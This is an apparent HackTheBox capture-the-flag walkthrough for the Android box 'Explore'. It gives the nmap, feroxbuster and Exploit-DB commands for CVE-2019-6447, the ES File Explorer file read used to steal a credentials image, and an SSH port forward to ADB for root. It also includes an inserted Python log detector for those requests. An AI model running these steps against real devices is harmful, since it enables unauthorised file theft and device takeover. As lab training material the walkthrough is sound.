HackTheBox Walkthrough : Explore

Today we take on another challenge from HackTheBox called "Explore". This lab is based on Android exploitation, in which ES File Explorer is vulnerable. So without wasting too much time, let's start.

Level : Easy

Attacking Strategy

  • Network Scanning
    • Nmap
  • Exploitation
    • ES explorer Vulnerability (CVE-2019-6447)
  • Privilege Escalation
    • Port Forwarding
    • ADB Shell

Walkthrough

IP Address : 10.10.10.247

We start with an Nmap scan, which reveals some open ports and services: SSH on 2222, HTTP on 42135, HTTP on 59777, etc.

nmap -p- -sC -sV --min-rate 10000 -oN nmap 10.10.10.247
Nmap scan report for 10.10.10.247
Host is up (0.091s latency).
Not shown: 65530 closed ports
PORT      STATE    SERVICE VERSION
2222/tcp  open     ssh     (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey: 
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp  filtered freeciv
36917/tcp open     unknown
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.0 400 Bad Request
|     Date: Sat, 16 Oct 2021 06:03:34 GMT
|     Content-Length: 22
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|   GetRequest: 
|     HTTP/1.1 412 Precondition Failed
|     Date: Sat, 16 Oct 2021 06:03:34 GMT
|     Content-Length: 0
|   HTTPOptions: 
|     HTTP/1.0 501 Not Implemented
|     Date: Sat, 16 Oct 2021 06:03:39 GMT
|     Content-Length: 29
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Method not supported: OPTIONS
|   Help: 
|     HTTP/1.0 400 Bad Request
|     Date: Sat, 16 Oct 2021 06:03:55 GMT
|     Content-Length: 26
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: HELP
|   RTSPRequest: 
|     HTTP/1.0 400 Bad Request
|     Date: Sat, 16 Oct 2021 06:03:39 GMT
|     Content-Length: 39
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     valid protocol version: RTSP/1.0
|   SSLSessionReq: 
|     HTTP/1.0 400 Bad Request
|     Date: Sat, 16 Oct 2021 06:03:55 GMT
|     Content-Length: 73
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: 
|     ?G???,???`~?
|     ??{????w????<=?o?
|   TLSSessionReq: 
|     HTTP/1.0 400 Bad Request
|     Date: Sat, 16 Oct 2021 06:03:55 GMT
|     Content-Length: 71
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: 
|     ??random1random2random3random4
|   TerminalServerCookie: 
|     HTTP/1.0 400 Bad Request
|     Date: Sat, 16 Oct 2021 06:03:55 GMT
|     Content-Length: 54
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: 
|_    Cookie: mstshash=nmap
42135/tcp open     http    ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
Service Info: Device: phone

From the Nmap result it is clear from the service information that this is some kind of Android device. Next we enumerate port 59777 (HTTP) with content discovery tools like gobuster and dirb, but nothing turns up. In 2018 we had a KitKat-based Android device, on which the file system is represented as sdcard, sdcard0, sdcard1, which I remember correctly because I rooted the device at that time. So we wondered whether we could enumerate this endpoint the same way.

feroxbuster -u http://10.10.10.247:59777/sdcard -x txt 

And we got the flag here, but after some time this service turned out to be a dead end, as it disclosed nothing else.

Exploitation

So we moved to the second port, 42135, on which ES File Explorer is running. After googling the service we found an exploit for an arbitrary file read vulnerability.

So we simply download the exploit from Exploit-DB; after reading it we see that we can pass commands like getDeviceInfo, getFile, etc.

python3 50070.py getDeviceInfo 10.10.10.247
python3 50070.py listPics 10.10.10.247
python3 50070.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg

The "listPics" command lists some pictures, one of which is "creds.jpg", so we simply download the file with the "getFile" command and obtain credentials for the "kristi" user.

kristi

[email protected]!
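For defenders, the same commands the exploit sends are a usable detection signature. The following is an added example, not part of the original post or of the public exploit: it assumes the well-known request shape of the vulnerable ES File Explorer service (an HTTP POST to TCP/59777 whose body is JSON with a "command" field) and uses a constructed log format and constructed sample lines; only the target address and the command names come from the walkthrough.

```python
"""Flag ES File Explorer (CVE-2019-6447) command requests in captured HTTP traffic.

Added example for this walkthrough. The log format below is constructed:
    <src_ip> <dst_ip>:<dst_port> <method> <path> <body>
The client address 10.10.14.5 is also constructed; 10.10.10.247 is the lab target.
"""
import json
import re

ES_PORT = 59777                              # port the vulnerable service listens on
RECON_COMMANDS = {"getDeviceInfo", "listPics"}  # commands used for enumeration in the post
FILE_READ_COMMANDS = {"getFile"}             # arbitrary file read, the real impact

LOG_RE = re.compile(r"^(\S+) (\S+):(\d+) (\S+) (\S+) (.*)$")


def classify(line):
    """Return a finding dict for an ES File Explorer command request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src, dst, port, method, _path, body = m.groups()
    if int(port) != ES_PORT or method != "POST":
        return None
    try:
        payload = json.loads(body)
    except json.JSONDecodeError:
        return None
    if not isinstance(payload, dict):
        return None
    cmd = payload.get("command")
    if cmd in FILE_READ_COMMANDS:
        severity = "high"
    elif cmd in RECON_COMMANDS:
        severity = "medium"
    elif cmd:
        severity = "low"   # unknown command aimed at the ES port still deserves a look
    else:
        return None
    return {"src": src, "dst": dst, "command": cmd,
            "path": payload.get("path"), "severity": severity}


def scan(lines):
    """Classify every log line and keep only the findings."""
    return [f for f in (classify(line) for line in lines) if f]


SAMPLE_LOG = [  # constructed traffic mirroring the steps in the walkthrough
    '10.10.14.5 10.10.10.247:59777 POST / {"command":"getDeviceInfo"}',
    '10.10.14.5 10.10.10.247:59777 POST / {"command":"listPics"}',
    '10.10.14.5 10.10.10.247:59777 POST / {"command":"getFile","path":"/storage/emulated/0/DCIM/creds.jpg"}',
    '10.10.14.5 10.10.10.247:59777 GET /sdcard/user.txt -',
    '10.10.14.5 10.10.10.247:59777 POST / {"command":"unknownCmd"}',
    '10.10.14.5 10.10.10.247:42135 POST / {"command":"getDeviceInfo"}',
    '10.10.14.5 10.10.10.247:59777 POST / not-json',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Run against real traffic by feeding the lines of a proxy or NetFlow-derived HTTP log in the same shape, or adapt LOG_RE to the collector's format.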

Privilege Escalation

Now we have the SSH credentials for a low-privileged user, but we want root, and here we got stuck: the only port left untouched is 5555, which is used by ADB by default. To go further we need to study ADB. After studying it, all we need to do is a simple port forward and then access the shell over localhost.

ssh -L 5555:localhost:5555 [email protected] -p 2222

Once the port forwarding is done we can access the shell on localhost, switch user to root and collect the flags.

adb -s 127.0.0.1:5555 shell
su 
cat data/root.txt
